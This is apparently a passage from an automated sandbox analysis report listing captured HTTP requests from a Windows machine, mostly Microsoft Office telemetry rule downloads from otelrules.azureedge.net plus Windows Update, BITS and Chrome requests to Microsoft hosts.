              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b2+uAFVzyd7zfyp&MD=xvAfNsrA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b2+uAFVzyd7zfyp&MD=xvAfNsrA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
